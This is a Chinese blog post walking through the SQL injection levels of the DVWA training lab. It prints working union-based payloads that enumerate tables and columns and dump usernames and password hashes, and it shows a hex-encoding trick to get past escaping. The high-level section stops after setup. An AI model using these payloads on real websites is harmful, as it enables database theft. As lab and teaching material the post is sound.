DVWA靶场通关(SQL注入)

已于 2022-03-10 20:33:25 修改
阅读量1.4w 收藏 179
点赞数 13
分类专栏: DVWA 文章标签: sql 数据库 database
于 2022-03-09 20:28:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56010012/article/details/123353103
版权

SQL Injection(SQL注入)概念

就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。

手工注入常规思路

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.得到数据

low

(1)判断是否存在sql注入,输入1',返回错误

判断存在sql注入:当输入1',返回错误,说明页面没有对1'进行过滤,即攻击者可以对数据库进行操作。

   输入1,回显正常,确认存在sql注入。

 (2)猜解SQL查询语句中的字段数

1' order by 2#


1' order by 3#

 

(3)确定回显位置(为第二个位置)

1' union select 1,2#

 (4)获取当前数据库。dvwa

1' union select 1,database()#

(5)获取数据库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

 

(6) 获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

 

(7)获取字段中的数据

1' union select user,password from users#

Medium

在level为medium时,网页通过下拉表单的格式提交数据。

从页面源代码中可以发现,代码不是get型注入,应该是把提交的数据存放到post数据中了。

 这时需要对其注入sql语句,则最好采用火狐浏览器所带有的插件hacker。

(1)构造Post data :id=4&Submit=Submit。网页可以回显id=4的字段。

(2)猜解SQL查询语句中的字段数。

id=1 order by 2 &Submit=Submit //正常回显
id=1 order by 3 &Submit=Submit  //报错

(3)确定回显位置。回显位置为2。

id=1 union select 1,2 &Submit=Submit

(4)获取数据库名

id=1 union select 1,database() &Submit=Submit

(5)获取表名。

id=4 union select 1, group_concat(table_name) from information_scheme.table where table_schema = database()&Submit=Submit

 

该方法行不通,需要转变思路,利用burpsuite抓包,修改数据包内容,得到网页的回显。

在下图详细介绍了,burpsuite的修改数据包的内容,所得到网页的回显。

标记为1:更改GET==>POST

标记为2:增加 Content-Type: application/x-www-form-urlencoded,这条记录若不添加,会造成网页没有任何回显。

标记为3:数据包内容(即构造的SQL语句)

标记为4:回显的内容。

 后续SQL注入的步骤修改的地方为标记3。

对于数据库5.0以上的版本,存在information_schema表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表等信息;

查找数据库DVWA中有多少表。

id=2 union select 1,table_name from information_schema.tables where table_schema=(select database())#&Submit=Submit

 回显内容:数据库dvwa中存在两个表user和guestbook

查看表中的字段

id=3 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

网页返回错误

 查看源代码

 $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); //mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。

因此当SQL语句中‘’,会直接让其转义,并不能对数据库的内容进行修改。所以需要对users进行编码;user转换为16进制为0x7573657273。

id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&Submit=Submit

 user表中的字段有user_id,first_name,last_name,user,password,avatar,last_login,failed_login,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

 获取关键数据

最后得到的密码是16进制数据,我们需要将其处理后使用。

id=1 union select user,password from users#&Submit=Submit

 

High

SQLMAP

实验需要再linux系统中实现,因此,首先需要再linux系统中进入DVWA平台,在浏览器中输入:http://靶机IP地址/DVWA-master/setup.php.

BRAVE_YAYA
关注
  • 13
    点赞
  • 179
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Kali linux在DVWA靶场SQL注入
qq_74298120的博客
06-20 1741
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
dvwa靶场通关sql injection
07-19
dvwa靶场通关sql injection
DVWA-SQL手工注入
2302_80164634的博客
02-03 1970
查完表名,查列名,语句是-1’ union select 1, group_concat(column_names) from information_schema.columns where table_name=’users’#如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。进行抓包,这里我的bp有了些问题,完了重下个,这里就引用一下一些查找的截屏。
Web漏洞分析(dvwaSQL手工注入、sqlmap注入)
王陈锋的博客
11-07 3482
借助Web漏洞教学和演练的开源工具DVWA,学习并了解Web漏洞(以SQL注入为例)的原理及利用,验证SQL注入漏洞的实现过程及结果,并思考应对web漏洞风险的策略与手段。1、操作系统:windows 7/8/10等2、开发环境:DVWA
DVWA通过攻略之SQL注入_dvwa sql注入
最新发布
2401_84968371的博客
05-12 1136
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
DVWA-SQL注入(全级别)
小纯的博客
02-08 6343
一、SQL注入概念 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 ...
寒假任务 DVWA靶场
2302_80044238的博客
02-23 1101
寒假任务 DVWA靶场通关 一、Brute Force 1.Low 方法1. 进入靶场根据题目显然是让我们破解出密码因为安全等级最低因此我们首先想到的是进行暴力破解 方法:使用爆破工具burpsuit进行常规操作抓包使用密码本也可以同时对账号和密码进行爆破**(注意:攻击类型选择Cluster bomb)如图:** 爆破结果如图: 说明用户名和密码分别是:admin password 分别输入提交结果如图: 源码分析: <?php if( isset( $_GET[ 'Login' ] ) )
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2060
SQL注入与自动注入
DVWA通过攻略之SQL注入
勿山几已
05-24 8538
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
sql手工注入dvwa初级靶场
太阳照耀我走四方
02-13 1540
sql手工注入dvwa靶场
渗透测试实验_在kali Linux 2021环境下使用sqlmap对DVWA进行sql注入
weixin_47133613的博客
04-06 7876
文章目录1. sqlmap是什么2. 启动kali Linux ,进行sqlmap更新3. 启动phpStudy,启动火狐浏览器代理,运行BurpSuite4. 如果sqlmap出现404或者返回test的报错,可以尝试重置DVWA,重启phpStudy5. 选择安全等级“Low”,点击“SQL Injection”,通过报文中的url和cookie构造sqlmap命令获取信息5.1 获取数据库5.2 获取dvwa数据库中的表名5.3 获取dvwa库中users表中的列名5.4 获取dvwa库中users表
网络渗透测试实验3:SQL注入DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1814
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web安全学习和实践的模拟靶场。描述中提到,这个教程是为刚接触Kali的爱好...
DVWA下的SQL注入
07-25
SQL
DVWA靶场搭建与使用
09-02
它提供了多种安全漏洞的模拟场景,包括SQL注入、跨站脚本(XSS)、文件包含、命令注入等,帮助用户提升对Web应用安全的理解。 **一、DVWA靶场环境准备** 在搭建DVWA之前,你需要一个支持PHP和MySQL的运行环境。常见...
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DVWA——SQL注入
m0_74426634的博客
04-07 1007
日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
DVWA靶场SQL注入
走马
11-07 139
得到两个值去hex解码分别是 guestbook,users这两个也是DVWA数据库下面的所有表名,根据表的名字就可以判断出账号与密码存储在了users这个表里面,所以我们要对这个表进行查询,查询这个表里面的所有字段,开始构造SQL语句。对这些内容分别进行解码,将要查询的字段提取出来,分别是user与password,再次构造SQL语句对这两个字段的内容进行查询。本次注入的是DVWA靶场SQL injection。1.判断是字符型注入还是数字型注入,构造SQL语句。4.联合查询,尝试查看内容回显的地方。
关于DVWA靶场SQL Injection(low,medium,high)代码分析及注入分析
qq_22792465的博客
06-10 410
下图为源码中提交表单action='#'的作用是将数据提交到当前页面。
dvwa靶场sql盲注入
06-03
DVWA是一个用于测试Web应用程序安全性的靶场,其中包含了一些漏洞,比如SQL注入漏洞。下面是在DVWA靶场进行SQL盲注的一般步骤: 1. 打开DVWA靶场,选择SQL注入模块。 2. 点击“注入”按钮,进入注入页面。 3. 在注入页面中找到需要注入的参数,并在参数后面加上单引号(')或双引号(")。 4. 如果页面正常显示,说明该参数没有注入漏洞;如果页面显示错误信息,说明该参数存在注入漏洞。 5. 在有注入漏洞的参数后面加上SQL注入语句(如1=1、'or 1=1--等),并观察页面输出。 6. 如果页面输出正常,说明注入语句没有被执行;如果页面输出异常,说明注入语句被执行了。 7. 利用SQL注入漏洞获取数据库信息或执行恶意操作。 需要注意的是,在实际应用中,攻击者会采用更加复杂的注入技巧和工具,因此,开发者需要加强对注入漏洞的防范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值